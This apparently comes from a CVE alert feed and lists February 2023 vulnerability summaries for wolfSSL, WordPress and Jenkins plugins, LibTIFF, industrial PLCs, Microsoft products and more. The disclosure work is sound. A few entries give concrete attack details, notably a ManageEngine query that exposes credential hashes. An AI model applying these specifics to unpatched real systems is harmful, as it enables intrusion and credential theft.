🚨 CVE-2022-38153An issue was discovered in wolfSSL before 5.5.0 (when --enable-session-ticket is used); however, only version 5.3.0 is exploitable. Man-in-the-middle attackers or a malicious server can crash TLS 1.2 clients during a handshake. If an attacker injects a large ticket (more than 256 bytes) into a NewSessionTicket message in a TLS 1.2 handshake, and the client has a non-empty session cache, the session cache frees a pointer that points to unallocated memory, causing the client to crash with a "free(): invalid pointer" message. NOTE: It is likely that this is also exploitable during TLS 1.3 handshakes between a client and a malicious server. With TLS 1.3, it is not possible to exploit this as a man-in-the-middle.🎖@cveNotify |
|
| 2023-02-15 23:30:09 |
🚨 CVE-2022-38152An issue was discovered in wolfSSL before 5.5.0. When a TLS 1.3 client connects to a wolfSSL server and SSL_clear is called on its session, the server crashes with a segmentation fault. This occurs in the second session, which is created through TLS session resumption and reuses the initial struct WOLFSSL. If the server reuses the previous session structure (struct WOLFSSL) by calling wolfSSL_clear(WOLFSSL* ssl) on it, the next received Client Hello (that resumes the previous session) crashes the server. Note that this bug is only triggered when resuming sessions using TLS session resumption. Only servers that use wolfSSL_clear instead of the recommended SSL_free; SSL_new sequence are affected. Furthermore, wolfSSL_clear is part of wolfSSL's compatibility layer and is not enabled by default. It is not part of wolfSSL's native API.🎖@cveNotify |
|
| 2023-02-15 23:30:08 |
🚨 CVE-2022-45543Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.🎖@cveNotify |
|
| 2023-02-15 23:30:07 |
🚨 CVE-2022-42455ASUS EC Tool driver (aka d.sys) 1beb15c90dcf7a5234ed077833a0a3e900969b60be1d04fcebce0a9f8994bdbb, as signed by ASUS and shipped with multiple ASUS software products, contains multiple IOCTL handlers that provide raw read and write access to port I/O and MSRs via unprivileged IOCTL calls. Local users can gain privileges.🎖@cveNotify |
|
| 2023-02-15 23:30:06 |
🚨 CVE-2022-45546Information Disclosure in Authentication Component of ScreenCheck BadgeMaker 2.6.2.0 application allows internal attacker to obtain credentials for authentication via network sniffing.🎖@cveNotify |
|
| 2023-02-15 23:30:05 |
🚨 CVE-2023-22855Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files on SMB shares. If one provides a file with the extension .t4, it is rendered with the .NET templating engine mono/t4, which can execute code.🎖@cveNotify |
|
| 2023-02-15 22:30:36 |
🚨 CVE-2022-41313A stored cross-site scripting vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can send an HTTP request to trigger this vulnerability.Form field id="switch_contact"🎖@cveNotify |
|
| 2023-02-15 22:30:35 |
🚨 CVE-2021-36471Directory Traversal vulnerability in AdminLTE 3.1.0 allows remote attackers to gain escalated privilege and view sensitive information via /admin/index2.html, /admin/index3.html URIs.🎖@cveNotify |
|
| 2023-02-15 22:30:34 |
🚨 CVE-2023-0731The Interactive Geo Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the action content parameter in versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-02-15 22:30:33 |
🚨 CVE-2023-23026Cross site scripting (XSS) vulnerability in sourcecodester oretnom23 sales management system 1.0, allows attackers to execute arbitrary code via the product_name and product_price inputs in file print.php.🎖@cveNotify |
|
| 2023-02-15 22:30:32 |
🚨 CVE-2023-23011Cross Site Scripting (XSS) vulnerability in InvoicePlane 1.6 via filter_product input to file modal_product_lookups.php.🎖@cveNotify |
|
| 2023-02-15 22:30:30 |
🚨 CVE-2023-0736Cross-site Scripting (XSS) - Stored in GitHub repository wallabag/wallabag prior to 2.5.4.🎖@cveNotify |
|
| 2023-02-15 22:30:29 |
🚨 CVE-2023-0735Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.5.4.🎖@cveNotify |
|
| 2023-02-15 22:30:28 |
🚨 CVE-2022-47419An XSS vulnerability was discovered in the Mayan EDMS DMS. Successful XSS exploitation was observed in the in-product tagging system.🎖@cveNotify |
|
| 2023-02-15 22:30:27 |
🚨 CVE-2023-23836SolarWinds Platform version 2022.4.1 was found to be susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to the SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-02-15 22:30:26 |
🚨 CVE-2022-38111SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-02-15 22:30:25 |
🚨 CVE-2022-47504SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-02-15 22:30:23 |
🚨 CVE-2022-47508Customers who had configured their polling to occur via Kerberos did not expect NTLM Traffic on their environment, but since we were querying for data via IP address this prevented us from utilizing Kerberos.🎖@cveNotify |
|
| 2023-02-15 22:30:22 |
🚨 CVE-2023-23459Priority Windows may allow Command Execution via SQL Injection using an unspecified method.🎖@cveNotify |
|
| 2023-02-15 22:30:21 |
🚨 CVE-2023-23462Libpeconv – integer overflow, before commit 75b1565 (30/11/2022).🎖@cveNotify |
|
| 2023-02-15 22:30:17 |
🚨 CVE-2023-23464Media CP Media Control Panel latest version. A Permissive Flash Cross-domain Policy may allow information disclosure.🎖@cveNotify |
|
| 2023-02-15 22:30:16 |
🚨 CVE-2023-23465Media CP Media Control Panel latest version. CSRF possible through unspecified endpoint.🎖@cveNotify |
|
| 2023-02-15 22:30:15 |
🚨 CVE-2023-23467Media CP Media Control Panel latest version. Reflected XSS possible through unspecified endpoint.🎖@cveNotify |
|
| 2023-02-15 22:30:14 |
🚨 CVE-2023-23847A cross-site request forgery (CSRF) vulnerability in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-02-15 22:30:13 |
🚨 CVE-2023-23848Missing permission checks in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-02-15 20:29:57 |
🚨 CVE-2022-40224A denial of service vulnerability exists in the web server functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP message header can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-15 20:29:56 |
🚨 CVE-2023-0102LS ELECTRIC XBC-DN32U with operating system version 01.80 is missing authentication for its deletion command. This could allow an attacker to delete arbitrary files.🎖@cveNotify |
|
| 2023-02-15 20:29:55 |
🚨 CVE-2022-45587Stack overflow vulnerability in function gmalloc in goo/gmem.cc in xpdf 4.04, allows local attackers to cause a denial of service.🎖@cveNotify |
|
| 2023-02-15 20:29:52 |
🚨 CVE-2023-0103If an attacker were to access memory locations of LS ELECTRIC XBC-DN32U with operating system version 01.80 that are outside of the communication buffer, the device stops operating. This could allow an attacker to cause a denial-of-service condition.🎖@cveNotify |
|
| 2023-02-15 20:29:51 |
🚨 CVE-2023-22803LS ELECTRIC XBC-DN32U with operating system version 01.80 is missing authentication to perform critical functions to the PLC. This could allow an attacker to change the PLC's mode arbitrarily.🎖@cveNotify |
|
| 2023-02-15 20:29:50 |
🚨 CVE-2023-22804LS ELECTRIC XBC-DN32U with operating system version 01.80 is missing authentication to create users on the PLC. This could allow an attacker to create and use an account with elevated privileges and take control of the device.🎖@cveNotify |
|
| 2023-02-15 20:29:49 |
🚨 CVE-2023-22805LS ELECTRIC XBC-DN32U with operating system version 01.80 has improper access control to its read prohibition feature. This could allow a remote attacker to remotely set the feature to lock users out of reading data from the device.🎖@cveNotify |
|
| 2023-02-15 20:29:45 |
🚨 CVE-2023-22806LS ELECTRIC XBC-DN32U with operating system version 01.80 transmits sensitive information in cleartext when communicating over its XGT protocol. This could allow an attacker to gain sensitive information such as user credentials.🎖@cveNotify |
|
| 2023-02-15 20:29:44 |
🚨 CVE-2021-27568An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. When it is not caught, it may cause programs using the library to crash or expose sensitive information.🎖@cveNotify |
|
| 2023-02-15 20:29:43 |
🚨 CVE-2022-47412Given a malicious document provided by an attacker, the ONLYOFFICE Workspace DMS is vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition.🎖@cveNotify |
|
| 2023-02-15 20:29:42 |
🚨 CVE-2022-45544Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter.🎖@cveNotify |
|
| 2023-02-15 20:29:39 |
🚨 CVE-2022-46892In Ampere AltraMax and Ampere Altra before 2.10c, improper access controls allows the OS to reinitialize a disabled root complex.🎖@cveNotify |
|
| 2023-02-15 20:29:38 |
🚨 CVE-2023-25725HAProxy before 2.7.3 may allow a bypass of access control because HTTP/1 headers are inadvertently lost in some situations, aka "request smuggling." The HTTP header parsers in HAProxy may accept empty header field names, which could be used to truncate the list of HTTP headers and thus make some headers disappear after being parsed and processed for HTTP/1.0 and HTTP/1.1. For HTTP/2 and HTTP/3, the impact is limited because the headers disappear before being parsed and processed, as if they had not been sent by the client. The fixed versions are 2.7.3, 2.6.9, 2.5.12, 2.4.22, 2.2.29, and 2.0.31.🎖@cveNotify |
|
| 2023-02-15 20:29:37 |
🚨 CVE-2022-44267ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.🎖@cveNotify |
|
| 2023-02-15 20:29:36 |
🚨 CVE-2022-44268ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it).🎖@cveNotify |
|
| 2023-02-15 18:30:03 |
🚨 CVE-2023-25765In Jenkins Email Extension Plugin 2.93 and earlier, templates defined inside a folder were not subject to Script Security protection, allowing attackers able to define email templates in folders to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.🎖@cveNotify |
|
| 2023-02-15 18:30:02 |
🚨 CVE-2023-25766A missing permission check in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-02-15 18:30:01 |
🚨 CVE-2023-25767A cross-site request forgery (CSRF) vulnerability in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers to connect to an attacker-specified web server.🎖@cveNotify |
|
| 2023-02-15 18:30:00 |
🚨 CVE-2023-25768A missing permission check in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers with Overall/Read permission to connect to an attacker-specified web server.🎖@cveNotify |
|
| 2023-02-15 18:29:59 |
🚨 CVE-2023-23943Nextcloud mail is an email app for the nextcloud home server platform. In affected versions the SMTP, IMAP and Sieve host fields allowed to scan for internal services and servers reachable from within the local network of the Nextcloud Server. It is recommended that the Nextcloud Maill app is upgraded to 1.15.0 or 2.2.2. The only known workaround for this issue is to completely disable the nextcloud mail app.🎖@cveNotify |
|
| 2023-02-15 18:29:57 |
🚨 CVE-2023-0800LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3502, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-15 18:29:56 |
🚨 CVE-2023-0263The WP Yelp Review Slider WordPress plugin before 7.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.🎖@cveNotify |
|
| 2023-02-15 18:29:55 |
🚨 CVE-2023-0796LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3592, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-15 18:29:54 |
🚨 CVE-2023-0797LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6921, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-15 18:29:53 |
🚨 CVE-2023-0799LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3701, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-15 18:29:49 |
🚨 CVE-2023-0275The Easy Accept Payments for PayPal WordPress plugin before 4.9.10 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-15 18:29:48 |
🚨 CVE-2023-0333The TemplatesNext ToolKit WordPress plugin before 3.2.9 does not validate some of its shortcode attributes before using them to generate an HTML tag, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-15 18:29:47 |
🚨 CVE-2023-0360The Location Weather WordPress plugin before 1.3.4 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-15 18:29:46 |
🚨 CVE-2023-0373The Lightweight Accordion WordPress plugin before 1.5.15 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-15 18:29:45 |
🚨 CVE-2023-0801LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6778, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-15 18:29:41 |
🚨 CVE-2023-0803LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3516, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-15 18:29:40 |
🚨 CVE-2023-0804LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3609, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-15 18:29:39 |
🚨 CVE-2023-0169The Zoho Forms WordPress plugin before 3.0.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-15 18:29:38 |
🚨 CVE-2023-0166The Product Slider for WooCommerce by PickPlugins WordPress plugin before 1.13.42 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-15 16:30:00 |
🚨 CVE-2023-23925Switcher Client is a JavaScript SDK to work with Switcher API which is cloud-based Feature Flag. Unsanitized input flows into Strategy match operation (EXIST), where it is used to build a regular expression. This may result in a Regular expression Denial of Service attack (reDOS). This issue has been patched in version 3.1.4. As a workaround, avoid using Strategy settings that use REGEX in conjunction with EXIST and NOT_EXIST operations.🎖@cveNotify |
|
| 2023-02-15 16:29:59 |
🚨 CVE-2022-24895Symfony is a PHP framework for web and console applications and a set of reusable PHP components. When authenticating users Symfony by default regenerates the session ID upon login, but preserves the rest of session attributes. Because this does not clear CSRF tokens upon login, this might enables same-site attackers to bypass the CSRF protection mechanism by performing an attack similar to a session-fixation. This issue has been fixed in the 4.4 branch.🎖@cveNotify |
|
| 2023-02-15 16:29:58 |
🚨 CVE-2023-0840A vulnerability classified as problematic was found in PHPCrazy 1.1.1. This vulnerability affects unknown code of the file admin/admin.php?action=users&mode=info&user=2. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221086 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-15 16:29:57 |
🚨 CVE-2022-32469An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the PnpSmm shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for the ACPI runtime memory used for the command buffer. This attack can be mitigated by copying the firmware block services data to SMRAM before checking it.🎖@cveNotify |
|
| 2023-02-15 16:29:53 |
🚨 CVE-2022-32475An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the VariableRuntimeDxe shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This issue was fixed in the kernel, which also protected chipset and OEM chipset code.🎖@cveNotify |
|
| 2023-02-15 16:29:52 |
🚨 CVE-2022-32477An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the FvbServicesRuntimeDxe shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for the ACPI runtime memory used for the command buffer. This attack can be mitigated by copying the firmware block services data to SMRAM before checking it.🎖@cveNotify |
|
| 2023-02-15 16:29:51 |
🚨 CVE-2023-0841A vulnerability, which was classified as critical, has been found in GPAC 2.3-DEV-rev40-g3602a5ded. This issue affects the function mp3_dmx_process of the file filters/reframe_mp3.c. The manipulation leads to heap-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221087.🎖@cveNotify |
|
| 2023-02-15 16:29:50 |
🚨 CVE-2023-25762Jenkins Pipeline: Build Step Plugin 2.18 and earlier does not escape job names in a JavaScript expression used in the Pipeline Snippet Generator, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control job names.🎖@cveNotify |
|
| 2023-02-15 16:29:49 |
🚨 CVE-2023-25763Jenkins Email Extension Plugin 2.93 and earlier does not escape various fields included in bundled email templates, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control affected fields.🎖@cveNotify |
|
| 2023-02-15 16:29:48 |
🚨 CVE-2023-25764Jenkins Email Extension Plugin 2.93 and earlier does not escape, sanitize, or sandbox rendered email template output or log output generated during template rendering, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create or change custom email templates.🎖@cveNotify |
|
| 2023-02-15 16:29:47 |
🚨 CVE-2023-25765In Jenkins Email Extension Plugin 2.93 and earlier, templates defined inside a folder were not subject to Script Security protection, allowing attackers able to define email templates in folders to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.🎖@cveNotify |
|
| 2023-02-15 16:29:46 |
🚨 CVE-2023-25766A missing permission check in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-02-15 16:29:45 |
🚨 CVE-2023-25767A cross-site request forgery (CSRF) vulnerability in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers to connect to an attacker-specified web server.🎖@cveNotify |
|
| 2023-02-15 16:29:40 |
🚨 CVE-2022-45796Command injection vulnerability in nw_interface.html in SHARP multifunction printers (MFPs)'s Digital Full-color Multifunctional System 202 or earlier, 120 or earlier, 600 or earlier, 121 or earlier, 500 or earlier, 402 or earlier, 790 or earlier, and Digital Multifunctional System (Monochrome) 200 or earlier, 211 or earlier, 102 or earlier, 453 or earlier, 400 or earlier, 202 or earlier, 602 or earlier, 500 or earlier, 401 or earlier allows remote attackers to execute arbitrary commands via unspecified vectors.🎖@cveNotify |
|
| 2023-02-15 16:29:39 |
🚨 CVE-2021-31573In Config Manager, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210009; Issue ID: OSBNB00123234.🎖@cveNotify |
|
| 2023-02-15 16:29:38 |
🚨 CVE-2022-42951An issue was discovered in Couchbase Server 6.5.x and 6.6.x before 6.6.6, 7.x before 7.0.5, and 7.1.x before 7.1.2. During the start-up of a Couchbase Server node, there is a small window of time (before the cluster management authentication has started) where an attacker can connect to the cluster manager using default credentials.🎖@cveNotify |
|
| 2023-02-15 16:29:37 |
🚨 CVE-2022-42950An issue was discovered in Couchbase Server 7.x before 7.0.5 and 7.1.x before 7.1.2. A crafted HTTP REST request from an administrator account to the Couchbase Server Backup Service can exhaust memory resources, causing the process to be killed, which can be used for denial of service.🎖@cveNotify |
|
| 2023-02-15 07:30:19 |
🚨 CVE-2022-38725An integer overflow in the RFC3164 parser in One Identity syslog-ng 3.0 through 3.37 allows remote attackers to cause a Denial of Service via crafted syslog input that is mishandled by the tcp or network function. syslog-ng Premium Edition 7.0.30 and syslog-ng Store Box 6.10.0 are also affected.🎖@cveNotify |
|
| 2023-02-15 07:30:18 |
🚨 CVE-2019-1584A security vulnerability exists in Zingbox Inspector version 1.293 and earlier, that allows for remote code execution if the Inspector were sent a malicious command from the Zingbox cloud, or if the Zingbox Inspector were tampered with to connect to an attacker's cloud endpoint.🎖@cveNotify |
|
| 2023-02-15 07:30:17 |
🚨 CVE-2019-15022A security vulnerability exists in Zingbox Inspector versions 1.294 and earlier, that allows for the Inspector to be susceptible to ARP spoofing.🎖@cveNotify |
|
| 2023-02-15 07:30:16 |
🚨 CVE-2019-15023A security vulnerability exists in Zingbox Inspector versions 1.294 and earlier, that results in passwords for 3rd party integrations being stored in cleartext in device configuration.🎖@cveNotify |
|
| 2023-02-15 07:30:15 |
🚨 CVE-2019-15019A security vulnerability exists in the Zingbox Inspector versions 1.294 and earlier, that could allow an attacker to supply an invalid software update image to the Zingbox Inspector.🎖@cveNotify |
|
| 2023-02-15 07:30:13 |
🚨 CVE-2019-15020A security vulnerability exists in the Zingbox Inspector versions 1.293 and earlier, that could allow an attacker to supply an invalid software update image to the Zingbox Inspector that could result in command injection.🎖@cveNotify |
|
| 2023-02-15 07:30:12 |
🚨 CVE-2017-9833** DISPUTED ** /cgi-bin/wapopen in Boa 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges. NOTE: multiple third parties report that this is a system-integrator issue (e.g., a vulnerability on one type of camera) because Boa does not include any wapopen program or any code to read a FILECAMERA variable.🎖@cveNotify |
|
| 2023-02-15 07:30:11 |
🚨 CVE-2019-15018A security vulnerability exists in the Zingbox Inspector versions 1.280 and earlier, where authentication is not required when binding the Inspector instance to a different customer tenant.🎖@cveNotify |
|
| 2023-02-15 07:30:10 |
🚨 CVE-2019-11281Pivotal RabbitMQ, versions prior to v3.7.18, and RabbitMQ for PCF, versions 1.15.x prior to 1.15.13, versions 1.16.x prior to 1.16.6, and versions 1.17.x prior to 1.17.3, contain two components, the virtual host limits page, and the federation management UI, which do not properly sanitize user input. A remote authenticated malicious user with administrative access could craft a cross site scripting attack that would gain access to virtual hosts and policy management information.🎖@cveNotify |
|
| 2023-02-15 07:30:09 |
🚨 CVE-2019-19774An issue was discovered in Zoho ManageEngine EventLog Analyzer 10.0 SP1 before Build 12110. By running "select hostdetails from hostdetails" at the /event/runquery.do endpoint, it is possible to bypass the security restrictions that prevent even administrative users from viewing credential data stored in the database, and recover the MD5 hashes of the accounts used to authenticate the ManageEngine platform to the managed machines on the network (most often administrative accounts). Specifically, this bypasses these restrictions: a query cannot mention password, and a query result cannot have a password column.🎖@cveNotify |
|
| 2023-02-15 07:30:08 |
🚨 CVE-2021-24388In the VikRentCar Car Rental Management System WordPress plugin before 1.1.7, there is a custom filed option by which we can manage all the fields that the users will have to fill in before saving the order. However, the field name is not sanitised or escaped before being output back in the page, leading to a stored Cross-Site Scripting issue. There is also no CSRF check done before saving the setting, allowing attackers to make a logged in admin set arbitrary Custom Fields, including one with XSS payload in it.🎖@cveNotify |
|
| 2023-02-15 07:30:06 |
🚨 CVE-2021-24487The St-Daily-Tip WordPress plugin through 4.7 does not have any CSRF check in place when saving its 'Default Text to Display if no tips' setting, and was also lacking sanitisation as well as escaping before outputting it the page. This could allow attacker to make logged in administrators set a malicious payload in it, leading to a Stored Cross-Site Scripting issue🎖@cveNotify |
|
| 2023-02-15 07:30:05 |
🚨 CVE-2021-24434The Glass WordPress plugin through 1.3.2 does not sanitise or escape its "Glass Pages" setting before outputting in a page, leading to a Stored Cross-Site Scripting issue. Furthermore, the plugin did not have CSRF check in place when saving its settings, allowing the issue to be exploited via a CSRF attack.🎖@cveNotify |
|
| 2023-02-15 07:30:03 |
🚨 CVE-2019-13762Insufficient policy enforcement in downloads in Google Chrome on Windows prior to 79.0.3945.79 allowed a local attacker to spoof downloaded files via local code.🎖@cveNotify |
|
| 2023-02-15 07:30:02 |
🚨 CVE-2019-13758Insufficient policy enforcement in navigation in Google Chrome on Android prior to 79.0.3945.79 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.🎖@cveNotify |
|
| 2023-02-15 07:30:01 |
🚨 CVE-2019-13747Uninitialized data in rendering in Google Chrome on Android prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2023-02-15 07:30:00 |
🚨 CVE-2019-13742Incorrect security UI in Omnibox in Google Chrome on iOS prior to 79.0.3945.79 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted domain name.🎖@cveNotify |
|
| 2023-02-15 05:30:10 |
🚨 CVE-2023-21553Azure DevOps Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:30:08 |
🚨 CVE-2023-21566Visual Studio Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:30:06 |
🚨 CVE-2023-21567Visual Studio Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:30:05 |
🚨 CVE-2023-21778Microsoft Dynamics Unified Service Desk Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:30:04 |
🚨 CVE-2023-21808.NET and Visual Studio Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:30:02 |
🚨 CVE-2023-21815Visual Studio Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:30:01 |
🚨 CVE-2023-21823Windows Graphics Component Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:59 |
🚨 CVE-2023-22743Git for Windows is the Windows port of the revision control system Git. Prior to Git for Windows version 2.39.2, by carefully crafting DLL and putting into a subdirectory of a specific name living next to the Git for Windows installer, Windows can be tricked into side-loading said DLL. This potentially allows users with local write access to place malicious payloads in a location where automated upgrades might run the Git for Windows installer with elevation. Version 2.39.2 contains a patch for this issue. Some workarounds are available. Never leave untrusted files in the Downloads folder or its sub-folders before executing the Git for Windows installer, or move the installer into a different directory before executing it.🎖@cveNotify |
|
| 2023-02-15 05:29:58 |
🚨 CVE-2023-23381Visual Studio Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:56 |
🚨 CVE-2023-23618Git for Windows is the Windows port of the revision control system Git. Prior to Git for Windows version 2.39.2, when `gitk` is run on Windows, it potentially runs executables from the current directory inadvertently, which can be exploited with some social engineering to trick users into running untrusted code. A patch is available in version 2.39.2. As a workaround, avoid using `gitk` (or Git GUI's "Visualize History" functionality) in clones of untrusted repositories.🎖@cveNotify |
|
| 2023-02-15 05:29:55 |
🚨 CVE-2023-21528Microsoft SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:54 |
🚨 CVE-2023-21529Microsoft Exchange Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:52 |
🚨 CVE-2023-21564Azure DevOps Server Cross-Site Scripting Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:51 |
🚨 CVE-2023-21568Microsoft SQL Server Integration Service (VS extension) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:49 |
🚨 CVE-2023-21570Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:48 |
🚨 CVE-2023-21571Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:47 |
🚨 CVE-2023-21572Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:45 |
🚨 CVE-2023-21573Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:43 |
🚨 CVE-2023-21684Microsoft PostScript Printer Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-15 05:29:42 |
🚨 CVE-2023-21685Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-14 02:30:01 |
